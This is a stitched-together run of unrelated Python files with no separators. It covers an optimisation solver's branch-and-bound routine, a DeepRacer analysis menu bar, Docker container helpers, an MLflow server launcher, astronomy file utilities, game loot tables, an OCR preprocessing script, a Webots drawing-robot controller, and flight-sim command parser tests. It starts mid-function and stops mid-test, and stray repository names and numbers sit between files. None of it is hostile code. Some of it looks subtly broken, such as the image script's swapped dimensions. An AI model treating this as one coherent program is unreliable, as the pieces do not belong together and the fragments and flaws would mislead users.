solution['lb'] = min(true_branch['lb'],false_branch['lb']) solution['ub'] = min(true_branch['ub'],false_branch['ub']) # check if gap is small enough solution['gap'] = solution['ub'] - solution['lb'] if solution['gap'] < epsilon: branch_var.unset() return solution # if the gap isn't small enough, we will choose a branch to go down def take_branch(true_or_false): branch_var.set(true_or_false) if true_or_false is True: branch_bools = true_branch['sol'] else: branch_bools = false_branch['sol'] # restore the values into the set of booleans for b, value in zip(booleans,branch_bools): b.save_value(value) return solve_wrapper(prob, i+1, booleans, depth, epsilon) # partition based on lower bounds if true_branch['lb'] < false_branch['lb']: true_subtree = take_branch(True) false_subtree = take_branch(False) else: false_subtree = take_branch(False) true_subtree = take_branch(True) # propagate best solution up the tree if true_subtree and false_subtree: if true_subtree['obj'] < false_subtree['obj']: return true_subtree return false_subtree if not false_subtree and true_subtree: return true_subtree if not true_subtree and false_subtree: return false_subtree # return best guess so far return solution def branch_and_bound(self, depth: int = 5, epsilon: float = 1e-3): objective, constr_map = self.canonicalize() dims = self._format_for_solver(constr_map, s.ECOS) variables = self.objective.variables() for constr in self.constraints: variables += constr.variables() booleans = [v for v in variables if isinstance(v, Boolean)] self.constraints.extend(b._LB <= b for b in booleans) self.constraints.extend(b <= b._UB for b in booleans) result = bound(self, booleans) # check if gap is small enough if result['gap'] < epsilon: return result['obj'] result = solve_wrapper(self, 0, booleans, depth, epsilon) # set the boolean values to the solution for b, value in zip(booleans, result['sol']): b.save_value(value) b.fix_values = cvxopt.matrix(True, b.size) return result['obj'] # add branch and bound a solution method problem.Problem.register_solve("branch and bound", branch_and_bound) src/ui/menu_bar.py # # DeepRacer Guru # # Version 3.0 onwards # # Copyright (c) 2021 dmh23 # from tkinter import Menu, messagebox import src.log.log_utils from src.ui.file_options_dialog import FileOptionsDialog from src.ui.open_file_dialog import OpenFileDialog from src.ui.new_files_dialog import NewFilesDialog from src.ui.episode_filter_dialog import EpisodeFilterDialog from src.ui.action_filter_dialog import ActionSpaceFilterDialog import src.secret_sauce.glue.glue as ss class MenuBar(): def __init__(self, root, main_app, file_is_open:bool, is_continuous_action_space:bool): self.main_app = main_app self.root = root self.menubar = Menu(root) self._file_is_open = file_is_open self._is_continuous_action_space = is_continuous_action_space self._create_menus() def _create_menus(self): self.add_file_menu() self.add_track_menu() if self._file_is_open: self.add_episode_menu() if not self._is_continuous_action_space: self.add_action_menu() self.add_sector_menu() self.add_analyze_menu() self.add_fitting_menu() self.add_zoom_menu() self.add_view_menu() self.add_secret_sauce_menu() self.add_admin_menu() self.root.config(menu=self.menubar) def refresh(self): self.menubar = Menu(self.root) self._create_menus() def add_track_menu(self): existing_log_world_names = src.log.log_utils.get_world_names_of_existing_logs(self.main_app.get_log_directory()) menu = Menu(self.menubar, tearoff=0) if existing_log_world_names: for i, t in enumerate(self.main_app.tracks.values()): if t.get_world_name() in existing_log_world_names: menu.add_command(label=t.get_name_on_menu(), command=lambda track=t: self.choose_track(track)) menu.add_separator() for i, t in enumerate(self.main_app.tracks.values()): if t.get_world_name() not in existing_log_world_names: menu.add_command(label=t.get_name_on_menu(), command=lambda track=t: self.choose_track(track)) self.menubar.add_cascade(label="Track", menu=menu) def add_sector_menu(self): menu = Menu(self.menubar, tearoff=0) for s in self.main_app.current_track.get_all_sector_names(): menu.add_command(label="Sector " + s, command=lambda sector=s: self.choose_sector(sector)) self.menubar.add_cascade(label="Sector", menu=menu) def add_file_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="New File(s)", command=self.new_files) menu.add_command(label="Open File", command=self.open_file) menu.add_command(label="Switch Directory", command=self.main_app.menu_callback_switch_directory) menu.add_separator() menu.add_command(label="Options", command=self.file_options) menu.add_separator() menu.add_command(label="Exit", command=self.root.quit) self.menubar.add_cascade(label="File", menu=menu) def add_zoom_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Zoom - In/Out", command=self.main_app.menu_callback_zoom_in_out) menu.add_separator() for s in self.main_app.current_track.get_all_sector_names(): menu.add_command(label="Sector " + s, command=lambda sector=s: self.zoom_sector(sector)) self.menubar.add_cascade(label="Zoom", menu=menu) def add_view_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Grid - Front", command=self.main_app.menu_callback_grid_front) menu.add_command(label="Grid - Back", command=self.main_app.menu_callback_grid_back) menu.add_command(label="Grid - Off", command=self.main_app.menu_callback_grid_off) menu.add_separator() menu.add_command(label="Analysis - Front", command=self.main_app.menu_callback_analyze_front) menu.add_command(label="Analysis - Back", command=self.main_app.menu_callback_analyze_back) menu.add_separator() menu.add_command(label="Track - Front", command=self.main_app.menu_callback_track_front) menu.add_command(label="Track - Back", command=self.main_app.menu_callback_track_back) menu.add_separator() menu.add_command(label="Track - Grey", command=self.main_app.menu_callback_track_grey) menu.add_command(label="Track - Blue", command=self.main_app.menu_callback_track_blue) menu.add_separator() menu.add_command(label="Sectors - On", command=self.main_app.menu_callback_sectors_on) menu.add_command(label="Sectors - Off", command=self.main_app.menu_callback_sectors_off) menu.add_separator() menu.add_command(label="Waypoints - Large", command=self.main_app.menu_callback_waypoints_large) menu.add_command(label="Waypoints - Small", command=self.main_app.menu_callback_waypoints_small) menu.add_command(label="Waypoints - Micro", command=self.main_app.menu_callback_waypoints_micro) menu.add_command(label="Waypoints - Off", command=self.main_app.menu_callback_waypoints_off) menu.add_separator() menu.add_command(label="Waypoint Labels - On", command=self.main_app.menu_callback_waypoint_labels_on) menu.add_command(label="Waypoint Labels - Off", command=self.main_app.menu_callback_waypoint_labels_off) menu.add_separator() menu.add_command(label="Annotations - Front", command=self.main_app.menu_callback_annotations_front) menu.add_command(label="Annotations - Back", command=self.main_app.menu_callback_annotations_back) menu.add_command(label="Annotations - Off", command=self.main_app.menu_callback_annotations_off) menu.add_separator() menu.add_command(label="Heading - On", command=self.main_app.menu_callback_heading_on) menu.add_command(label="Heading - Off", command=self.main_app.menu_callback_heading_off) menu.add_separator() menu.add_command(label="True Bearing - On", command=self.main_app.menu_callback_true_bearing_on) menu.add_command(label="True Bearing - Off", command=self.main_app.menu_callback_true_bearing_off) menu.add_separator() menu.add_command(label="Camera Vision - On", command=self.main_app.menu_callback_camera_vision_on) menu.add_command(label="Camera Vision - Off", command=self.main_app.menu_callback_camera_vision_off) self.menubar.add_cascade(label="View", menu=menu) def add_analyze_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Episode Route", command=self.main_app.menu_callback_analyze_route) menu.add_command(label="Episode Speed", command=self.main_app.menu_callback_analyze_episode_speed) menu.add_command(label="Episode Reward", command=self.main_app.menu_callback_analyze_episode_reward) menu.add_command(label="Episode Slide", command=self.main_app.menu_callback_analyze_episode_slide) if not self._is_continuous_action_space: menu.add_command(label="Episode Action Distribution", command=self.main_app.menu_callback_analyze_episode_action_distribution) menu.add_separator() menu.add_command(label="Heatmap", command=self.main_app.menu_callback_analyze_track_heatmap) menu.add_command(label="Heatmap + Episode Route", command=self.main_app.menu_callback_analyze_route_over_heatmap) menu.add_command(label="Heatmap + Exit Points", command=self.main_app.menu_callback_analyze_exit_points_over_heatmap) menu.add_separator() menu.add_command(label="Exit Points", command=self.main_app.menu_callback_analyze_exit_points) menu.add_command(label="Simulate Race", command=self.main_app.menu_callback_analyze_race) menu.add_separator() # TODO - hyperparams ... # menu.add_command(label="View Hyperparameters", command=self.main_app.menu_callback_analyze_hyperparameters) menu.add_command(label="Compare Discount Factors", command=self.main_app.menu_callback_analyze_discount_factors) menu.add_separator() menu.add_command(label="Training Progress", command=self.main_app.menu_callback_analyze_training_progress) menu.add_command(label="Quarterly Results", command=self.main_app.menu_callback_analyze_quarterly_results) menu.add_command(label="Complete Lap Percentage", command=self.main_app.menu_callback_analyze_complete_lap_percentage) menu.add_separator() menu.add_command(label="Lap Time Correlations", command=self.main_app.menu_callback_analyze_lap_time_correlations) menu.add_command(label="Lap Time Distribution", command=self.main_app.menu_callback_analyze_lap_time_distribution) menu.add_separator() menu.add_command(label="Sector Time Correlations", command=self.main_app.menu_callback_analyze_sector_time_correlations) menu.add_separator() menu.add_command(label="Reward Distribution", command=self.main_app.menu_callback_analyze_reward_distribution) menu.add_command(label="Common Rewards", command=self.main_app.menu_callback_analyze_common_rewards) menu.add_command(label="Rewards per Waypoint", command=self.main_app.menu_callback_analyze_rewards_per_waypoint) self.menubar.add_cascade(label="Analyze", menu=menu) def add_fitting_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Track Curve Fitting", command=self.main_app.menu_callback_analyze_curve_fitting) menu.add_command(label="Track Straight Fitting", command=self.main_app.menu_callback_analyze_straight_fitting) self.menubar.add_cascade(label="Fitting", menu=menu) def add_episode_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="All", command=self.main_app.menu_callback_episodes_all) menu.add_command(label="All From Start", command=self.main_app.menu_callback_episodes_all_from_start) menu.add_separator() menu.add_command(label="Complete Laps", command=self.main_app.menu_callback_episodes_complete_laps) menu.add_command(label="Complete Laps from Start", command=self.main_app.menu_callback_episodes_complete_laps_from_start) menu.add_command(label="Fast Laps", command=self.main_app.menu_callback_episodes_fast_laps) menu.add_separator() menu.add_command(label="10% complete", command=self.main_app.menu_callback_episodes_min_percent_10) menu.add_command(label="25% complete", command=self.main_app.menu_callback_episodes_min_percent_25) menu.add_command(label="33% complete", command=self.main_app.menu_callback_episodes_min_percent_33) menu.add_command(label="50% complete", command=self.main_app.menu_callback_episodes_min_percent_50) menu.add_separator() menu.add_command(label="Q1", command=self.main_app.menu_callback_episodes_q1) menu.add_command(label="Q2", command=self.main_app.menu_callback_episodes_q2) menu.add_command(label="Q3", command=self.main_app.menu_callback_episodes_q3) menu.add_command(label="Q4", command=self.main_app.menu_callback_episodes_q4) menu.add_separator() for s in self.main_app.current_track.get_all_sector_names(): menu.add_command(label="Sector " + s, command=lambda sector=s: self._choose_episode_filter_sector(sector)) menu.add_separator() menu.add_command(label="More ...", command=self.open_episode_filter_dialog) self.menubar.add_cascade(label="Episodes", menu=menu) def add_action_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="All", command=self.main_app.menu_callback_actions_all) menu.add_command(label="High Speed", command=self.main_app.menu_callback_actions_high_speed) menu.add_command(label="Medium Speed", command=self.main_app.menu_callback_actions_medium_speed) menu.add_command(label="Low Speed", command=self.main_app.menu_callback_actions_low_speed) menu.add_command(label="Straight", command=self.main_app.menu_callback_actions_straight) menu.add_separator() menu.add_command(label="More ...", command=self.open_action_space_filter_dialog) self.menubar.add_cascade(label="Actions", menu=menu) def add_secret_sauce_menu(self): if ss.SHOW_SS: ss.make_menu(self.menubar, self.main_app) def add_admin_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Re-calculate Log Meta", command=self.refresh_all_log_meta) menu.add_command(label="View Log File Info", command=self.main_app.menu_callback_view_log_file_info) self.menubar.add_cascade(label="Admin", menu=menu) def new_files(self): NewFilesDialog(self.main_app, self.main_app.please_wait) self.refresh() def open_file(self): OpenFileDialog(self.main_app, "Open File") def file_options(self): FileOptionsDialog(self.main_app) def choose_track(self, track): self.main_app.menu_callback_switch_track(track) def choose_sector(self, sector: str): self.main_app.menu_callback_sector_filter(sector) def zoom_sector(self, sector: str): self.main_app.menu_callback_sector_zoom(sector) def _choose_episode_filter_sector(self, sector: str): self.main_app.menu_callback_episodes_sector(sector) def open_episode_filter_dialog(self): EpisodeFilterDialog(self.main_app) def open_action_space_filter_dialog(self): ActionSpaceFilterDialog(self.main_app) def refresh_all_log_meta(self): src.log.log_utils.refresh_all_log_meta(self.main_app.please_wait, self.main_app.get_log_directory()) self.main_app.please_wait.stop() messagebox.showinfo("Refresh All Log Meta", "Refresh succeeded!") self.refresh() shouc/corbfuzz import time import os import uuid import config import utils def create_image(docker_file_path: str): docker_file = open(docker_file_path + "/Dockerfile").read() build_id = uuid.uuid4() tmp_file_path = f"/tmp/{build_id}" os.system(f"cp -R {docker_file_path} {tmp_file_path}") with open(f"{tmp_file_path}/Dockerfile", "w") as fp: fp.write(docker_file) config.DOCKER_INSTANCE.images.build(path=tmp_file_path, tag=build_id) return build_id def spin_up_container(build_id: str): assert build_id in config.DOCKER_INSTANCE.images.list() container_id = config.DOCKER_INSTANCE.containers.run(build_id, detach=True).id time.sleep(10) utils.INFO("Spinning up the container....") container = config.DOCKER_INSTANCE.containers.get(container_id) utils.REDIS_OBJ.set("target", container.attrs['NetworkSettings']['IPAddress']) return container def get_target(): if config.USE_DOCKER: while not utils.REDIS_OBJ.get("target"): time.sleep(config.WAIT_TIME) return utils.REDIS_OBJ.get("target").decode("latin-1") return config.TARGET import argparse import logging import traceback import tornado.ioloop from pyfunc_ensembler_runner.server import PyFuncEnsemblerServer from pyfunc_ensembler_runner import PyFuncEnsemblerRunner parser = argparse.ArgumentParser() parser.add_argument('--mlflow_ensembler_dir', required=True, help='A dir pointing to the saved Mlflow Pyfunc ensembler') parser.add_argument('--dry_run', default=False, action='store_true', required=False, help="Dry run pyfunc ensembler by loading the specified ensembler " "in --mlflow_ensembler_dir without starting webserver") parser.add_argument('-l', '--log-level', dest='log_level', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], help='Set the logging level', default=logging.DEBUG) args, _ = parser.parse_known_args() if __name__ == "__main__": logging.basicConfig(level=args.log_level) logging.info( 'Called with arguments:\n%s\n', '\n'.join([f'{k}: {v}' for k, v in vars(args).items()]) ) ensembler = PyFuncEnsemblerRunner(args.mlflow_ensembler_dir) try: ensembler.load() except Exception as e: logging.error("Unable to initialise PyFuncEnsemblerRunner from the MLflow directory provided.") logging.error(traceback.format_exc()) exit(1) if args.dry_run: logging.info("Dry run success") exit(0) app = PyFuncEnsemblerServer(ensembler).create_application() logging.info("Ensembler ready to serve requests!") app.listen(8083) tornado.ioloop.IOLoop.current().start() 0 """Utilities for the-wizz library. Contains file loading/closing, cosmology, and setting the verbosity of the outputs. """ from astropy.cosmology import WMAP5 from astropy.io import fits import h5py import numpy as np def file_checker_loader(input_file_name): """Utility function for checking the existence of a file and loading the file with the proper format. Currently checks for FITS files. ---------------------------------------------------------------------------- Args: sample_file_name: name of file on disk to load Returns: open file object data """ try: file_handle = open(input_file_name) file_handle.close() except IOError: print("IOError: File %s not found. the-wizz is exiting." % input_file_name) raise IOError("File not found.") if input_file_name.endswith('fit') or input_file_name.endswith('fits') or \ input_file_name.endswith('gz') or input_file_name.endswith('cat'): hdu_list = fits.open(input_file_name) data = hdu_list[1].data return data elif input_file_name.endswith('hdf5') or input_file_name.endswith('dat'): hdf5_file = h5py.File(input_file_name, 'r') return hdf5_file else: print("File type not currently supported. Try again later. " "the-wizz is exiting.") raise IOError return None def create_hdf5_file(hdf5_file_name, args): # TODO: # Decide if I want to use libver latest or not. Could be more stable # if we use the "earliest" version. Will have to speed test saving # and loading of the pairs. """Convenience function for creating an HDF5 file with attributes set in input_flags. Saves the current input flags to the group input_flags for later reference ---------------------------------------------------------------------------- Args: hdf5_file_name: string name of the HDF5 file to create args: argparse ArgumentParser.parse_args object from input_flags Returns: open HDF5 file object """ hdf5_file = h5py.File(hdf5_file_name, 'w-', libver='latest') if args is not None: flag_grp = hdf5_file.create_group('input_flags') for arg in vars(args): kwargs = {} if type(arg) is str: kwargs["dtype"] = h5py.special_dtype(vlen=str) if getattr(args, arg) is None: flag_grp.attrs.create( arg, 'None', dtype=h5py.special_dtype(vlen=str)) else: flag_grp.attrs.create(arg, getattr(args, arg), **kwargs) return hdf5_file def create_ascii_file(ascii_file_name, args): """Convenience function for creating an output ascii file. This method writes the current state of the input_flags arguments to the header of the file and returns an open Python file handle object. The method will over write any file it is given so use with caution. ---------------------------------------------------------------------------- Args: ascii_file_name: string name of the file to write too args: argparse ArgumentParser.parse_args object from input_flags Returns: open Python file object """ ascii_file = open(ascii_file_name, 'w') ascii_file.writelines('# input_flags:\n') for arg in vars(args): ascii_file.writelines('#\t%s : %s\n' % (arg, getattr(args, arg))) return ascii_file 1-10 """ Maps tiers to roll rates for all food items at that tier and lower. """ # Local application imports from gym_snape.game.utils import RollRate from gym_snape.game.food.tier1 import * from gym_snape.game.food.tier2 import * from gym_snape.game.food.tier3 import * from gym_snape.game.food.tier4 import * from gym_snape.game.food.tier5 import * from gym_snape.game.food.tier6 import * roll_rates = { 1: [ RollRate(Apple, 0.5), RollRate(Honey, 0.5) ], 2: [ RollRate(Apple, 0.2), RollRate(Honey, 0.2), RollRate(Cupcake, 0.2), RollRate(MeatBone, 0.2), RollRate(SleepingPill, 0.2) ], 3: [ RollRate(Apple, 0.1), RollRate(Honey, 0.15), RollRate(Cupcake, 0.15), RollRate(MeatBone, 0.15), RollRate(SleepingPill, 0.15), RollRate(Garlic, 0.15), RollRate(SaladBowl, 0.15) ], 4: [ RollRate(Apple, 0), RollRate(Honey, 0.05), RollRate(Cupcake, 0.05), RollRate(MeatBone, 0.15), RollRate(SleepingPill, 0.15), RollRate(Garlic, 0.15), RollRate(SaladBowl, 0.15), RollRate(CannedFood, 0.15), RollRate(Pear, 0.15) ], 5: [ RollRate(Apple, 0), RollRate(Honey, 0), RollRate(Cupcake, 0), RollRate(MeatBone, 0.1), RollRate(SleepingPill, 0.1), RollRate(Garlic, 0.1), RollRate(SaladBowl, 0.1), RollRate(CannedFood, 0.12), RollRate(Pear, 0.12), RollRate(Chili, 0.12), RollRate(Chocolate, 0.12), RollRate(Sushi, 0.12) ], 6: [ RollRate(Apple, 0), RollRate(Honey, 0), RollRate(Cupcake, 0), RollRate(MeatBone, 0), RollRate(SleepingPill, 0), RollRate(Garlic, 0.05), RollRate(SaladBowl, 0.05), RollRate(CannedFood, 0.1), RollRate(Pear, 0.1), RollRate(Chili, 0.1), RollRate(Chocolate, 0.1), RollRate(Sushi, 0.1), RollRate(Melon, 0.1), RollRate(Mushroom, 0.1), RollRate(Pizza, 0.1), RollRate(Steak, 0.1) ] } if __name__ == '__main__': """Check that all roll rates are valid.""" # Lazy import since only need numpy for this test import numpy as np for i in sorted(roll_rates.keys()): food, rates = [], [] for rr in roll_rates[i]: food.append(rr.item) rates.append(rr.rate) try: np.random.choice(food, p=rates, size=1) except: print(f'Could not sample from tier {i}') print(f'Summed to {np.sum(rates)}') preprocessing.py # Python 3.7.6 # -*- coding: utf-8 -*- # Author: import os import random import cv2 import fnmatch import numpy as np from tqdm import tqdm char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' len_char_list = len(char_list) path = str(os.getcwd()) while True: windows = input('Are you using Windows? (y/n) ') if (windows != 'y' and windows != 'n'): windows = input('Are you using Windows? (y/n) ') else: break if windows == 'y': path = path + r'\mjsynth.tar\mnt\ramdisk\max\90kDICT32px' else: path = path + '/mnt/ramdisk/max/90kDICT32px' width = 32 height = 128 dim = (width, height) # convert each character of the word into a label (int) def char_to_int(word): int_list = [] for i, c in enumerate(word): int_list.append(char_list.index(c)) return np.array(int_list) def preprocessing(datafile, max_data): max_text_length = 0 len_data = 0 data_img = [] data_txt = [] # prepare storage if not os.path.exists('train'): os.mkdir('train') if not os.path.exists('val'): os.mkdir('val') if not os.path.exists('test'): os.mkdir('test') data_samples = [] with open(path+datafile, 'r', encoding='utf-8') as tr: for line in tr.readlines(): data_samples.append(line[1:].split(' ')[0]) random_selection = random.sample(data_samples, max_data) print(len(random_selection)) for filename in tqdm(random_selection): # get text seen on the image (which is the filename) text = filename.split('_')[-2] # keep track of the maximum text length if len(text) > max_text_length: max_text_length = len(text) # convert image to gray scale img = cv2.cvtColor(cv2.imread(path+filename), cv2.COLOR_BGR2GRAY) # convert image to shape (32, 128, 1) w, h = img.shape if (w != width and h != height): img = cv2.resize(img, dim, interpolation=cv2.INTER_AREA) img = np.expand_dims(img , axis=2) # normalize image img = img/255 data_img.append(img) data_txt.append(char_to_int(text)) len_data += 1 # break loops when enough data is collected if len_data == max_data: break print('Max text length: ', max_text_length) sav_str = datafile.split('_')[1].split('.')[0] # saving np.save(sav_str+'/'+sav_str+'_data.npy', np.array(data_img)) np.save(sav_str+'/'+sav_str+'_labels.npy', np.array(data_txt)) print(len(data_img)) print(len(data_txt)) if __name__ == '__main__': preprocessing('/annotation_test.txt', 20000) preprocessing('/annotation_val.txt', 20000) preprocessing('/annotation_train.txt', 160000)from controller import Robot TIME_STEP = 64 DS_L = 0 DS_R = 1 DS_WALL_STOP = 400 class ScribbleBot: def __init__(self): self.robot = Robot() # Define and enable distance sensors self.ds = [self.robot.getDistanceSensor(name) for name in ['ds_left', 'ds_right']] for sensor in self.ds: sensor.enable(TIME_STEP) # Define motors self.front_left_motor = self.robot.getMotor('wheel1') self.front_right_motor = self.robot.getMotor('wheel2') self.back_left_motor = self.robot.getMotor('wheel3') self.back_right_motor = self.robot.getMotor('wheel4') # Group motors for easy access self.motors = [ self.front_left_motor, self.front_right_motor, self.back_left_motor, self.back_right_motor ] # Enable motors for motor in self.motors: motor.setPosition(float('inf')) motor.setVelocity(0.0) # Define encoders self.enc_front_left = self.robot.getPositionSensor('front left position') self.enc_front_right = self.robot.getPositionSensor('front right position') self.enc_back_left = self.robot.getPositionSensor('back left position') self.enc_back_right = self.robot.getPositionSensor('back right position') # Enable encoders self.enc_front_left.enable(TIME_STEP) self.enc_front_right.enable(TIME_STEP) self.enc_back_left.enable(TIME_STEP) self.enc_back_right.enable(TIME_STEP) # Line generator self.pen = self.robot.getPen('pen') self.pen.write(True) # Positions of encoders self.position_front_left = 0 self.position_back_left = 0 self.position_front_right = 0 self.position_back_right = 0 # Internal velocities, one per side self.left_vel = 0 self.right_vel = 0 # List for distance sensor values self.ds_values = [] def write_motors(self): """Write the current velocities into motor objects""" self.front_left_motor.setVelocity(self.left_vel) self.back_left_motor.setVelocity(self.left_vel) self.front_right_motor.setVelocity(self.right_vel) self.back_right_motor.setVelocity(self.right_vel) def stop_motors(self): """Helper util to stop motors""" self.left_vel = 0 self.right_vel = 0 self.write_motors() def capture_position(self): """Capture current encoder values in position variables""" # Left positions self.position_front_left = self.enc_front_left.getValue() self.position_back_left = self.enc_back_left.getValue() # Right positions self.position_front_right = self.enc_front_right.getValue() self.position_back_right = self.enc_back_right.getValue() def check_left_moved(self, distance: float) -> bool: """ Manages a left side distance move. If either motor has achieved distance required, it is manually stopped. If both have, function returns `True` """ front_moved = abs(self.enc_front_left.getValue() - self.position_front_left) > distance back_moved = abs(self.enc_back_left.getValue() - self.position_back_left) > distance if front_moved: self.front_left_motor.setVelocity(0) if back_moved: self.back_left_motor.setVelocity(0) both = front_moved and back_moved if both: self.left_vel = 0 return both def check_right_moved(self, distance: float) -> bool: """ Manages a right side distance move. If either motor has achieved distance required, it is manually stopped. If both have, function returns `True` """ front_moved = abs(self.enc_front_right.getValue() - self.position_front_right) > distance back_moved = abs(self.enc_back_right.getValue() - self.position_back_right) > distance if front_moved: self.front_right_motor.setVelocity(0) if back_moved: self.back_right_motor.setVelocity(0) both = front_moved and back_moved if both: self.right_vel = 0 return both def make_turn(self, left_dist: float, right_dist: float): """ Makes a turn based on velocities and encoder positions. Blocking. Velocities must be set outside function call. Each wheel is moved to corresponding side distance and stopped """ self.write_motors() self.capture_position() while self.robot.step(TIME_STEP) != -1: left_moved = self.check_left_moved(left_dist) right_moved = self.check_right_moved(right_dist) if left_moved and right_moved: break def make_left_turn(self, distance: float): """ Make a left turn by a distance. Blocking. Velocities must be set outside function call. `distance` pertains to right wheel, left wheel distance is calculated from this and velocity ratio for perfect arcing turn """ ratio = self.left_vel / self.right_vel self.make_turn(ratio * distance, distance) def make_right_turn(self, distance: float): """ Make a right turn by a distance. Blocking. Velocities must be set outside function call. `distance` pertains to left wheel, right wheel distance is calculated from this and velocity ratio for perfect arcing turn """ ratio = self.right_vel / self.left_vel self.make_turn(distance, ratio * distance) def move_dist(self, distance: float): """ Move a distance forward. Blocking. Velocities must be set outside function call """ self.write_motors() self.capture_position() while self.robot.step(TIME_STEP) != -1: left_moved = self.check_left_moved(distance) right_moved = self.check_right_moved(distance) if left_moved and right_moved: break def load_distance_values(self): """Load current distance values from `self.ds` into `self.ds_values`""" self.ds_values = [] for ds in self.ds: self.ds_values.append(ds.getValue()) def init_sensors(self): """Initialize sensors to avoid error values like NaN""" for i in range(0, 5): if self.robot.step(TIME_STEP) == -1: break for ds in self.ds: ds.getValue() self.enc_front_left.getValue() self.enc_front_right.getValue() self.enc_back_left.getValue() self.enc_back_right.getValue() def do_the_wave(self): """Do the waaaaave""" # Entry turn to the right self.left_vel = 3 self.right_vel = 0.1 self.make_right_turn(6) # Arcing main turn to the left self.left_vel = 1 self.right_vel = 3.5 self.make_left_turn(15.8) # Exiting turn to the right self.left_vel = 3 self.right_vel = 0.5 self.make_right_turn(4.5) # Aligning turn to the right, slow and precise self.left_vel = 1 self.right_vel = 0.2 self.make_right_turn(1.94) def search_for_wall(self): """Drive forward until wall is found""" print('Finding end wall...') self.left_vel = 3 self.right_vel = 3 self.write_motors() while self.robot.step(TIME_STEP) != -1: self.load_distance_values() # print('FL: {} FR: {}'.format(self.ds_values[DS_L], self.ds_values[DS_R])) if self.ds_values[DS_L] < DS_WALL_STOP and self.ds_values[DS_R] < DS_WALL_STOP: break def setup(self): """Pre-movement initializations. Runs once""" print('Initializing...') self.init_sensors() self.left_vel = 3 self.right_vel = 3 self.write_motors() def main(self): """Main code. Usually a loop or series of loops""" print('Running...') self.move_dist(7) for i in range(4): self.do_the_wave() self.search_for_wall() def cleanup(self): """Post-movement finishing code""" self.stop_motors() print('Finished drawing.') def run(self): """Primary running method""" self.setup() self.main() self.cleanup() print('Loading robot...') scribbles = ScribbleBot() scribbles.run() import unittest from xcopilot.commands import CommandProcessor from xcopilot.config import DefaultCommands class CommandProcessorTest(unittest.TestCase): def _assertCommand(self, command, name, value): self.assertIsNotNone(command, 'Command unrecognized') self.assertEqual(command.name, name) self.assertEqual(command.value, value) def _assertCommandNotRecognized(self, command): self.assertIsNone(command, 'Command recognized when it should not') def setUp(self): self.commandProcessor = CommandProcessor() self.commandProcessor.setConfig(DefaultCommands) def test_support_SET_ALTIMETER_command(self): self._assertCommand(self.commandProcessor.parseCommand('set altimeter 2992'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter 2 99 2'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter 2 9 9 2'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter two nine nine two'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter two 9 nine 2'), 'SET_ALTIMETER', 29.92) self._assertCommand(self.commandProcessor.parseCommand('set altimeter three zero zero 0'), 'SET_ALTIMETER', 30.00) self._assertCommand(self.commandProcessor.parseCommand('set altimeter three zero one two'), 'SET_ALTIMETER', 30.12) self._assertCommand(self.commandProcessor.parseCommand('set altimeter one zero one three'), 'SET_ALTIMETER', 1013 * 0.0295301) def test_support_SET_ALTITUDE_command(self): self._assertCommand(self.commandProcessor.parseCommand('set altitude one zero three'), 'SET_ALTITUDE', 103) self._assertCommand(self.commandProcessor.parseCommand('set altitude two nine zero zero'), 'SET_ALTITUDE', 2900) self._assertCommand(self.commandProcessor.parseCommand('set altitude three five eight zero zero'), 'SET_ALTITUDE', 35800) def test_support_FLIGHT_LEVEL_command(self): self._assertCommand(self.commandProcessor.parseCommand('set flight level three five zero'), 'FLIGHT_LEVEL', 35000) self._assertCommand(self.commandProcessor.parseCommand('flight level zero five zero'), 'FLIGHT_LEVEL', 5000) def test_support_LANDING_GEAR_command(self): self._assertCommand(self.commandProcessor.parseCommand('landing gear up'), 'LANDING_GEAR', 0) self._assertCommand(self.commandProcessor.parseCommand('landing gear down'), 'LANDING_GEAR', 1) self._assertCommand(self.commandProcessor.parseCommand('gear up'), 'LANDING_GEAR', 0) self._assertCommand(self.commandProcessor.parseCommand('gear down'), 'LANDING_GEAR', 1) def test_support_FLAPS_command(self): self._assertCommand(self.commandProcessor.parseCommand('flaps up'), 'FLAPS', 0) self._assertCommand(self.commandProcessor.parseCommand('flaps down'), 'FLAPS', 1) def test_support_SET_NAV1_command(self): self._assertCommand(self.commandProcessor.parseCommand('set nav one to one zero eight decimal two five'), 'SET_NAV1', 10825) self._assertCommand(self.commandProcessor.parseCommand('set nav one to one zero eight two zero'), 'SET_NAV1', 10820) self._assertCommand(self.commandProcessor.parseCommand('set nav one to one zero eight decimal two'), 'SET_NAV1', 10820) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five one')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five two')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five three')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five four')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five six')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five sevem')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five eight')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set nav one to one zero eight decimal five nine')) def test_support_SET_COM1_command(self): self._assertCommand(self.commandProcessor.parseCommand('set com one to one one eight decimal two five'), 'SET_COM1', 11825) self._assertCommand(self.commandProcessor.parseCommand('set com one to one one eight two seven'), 'SET_COM1', 11827) self._assertCommand(self.commandProcessor.parseCommand('set com one to one one eight decimal two'), 'SET_COM1', 11820) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set com one to one zero eight decimal five zero')) self._assertCommandNotRecognized(self.commandProcessor.parseCommand('set com one to one three eight five')) def test_support_LANDING_LIGHTS_command(self): 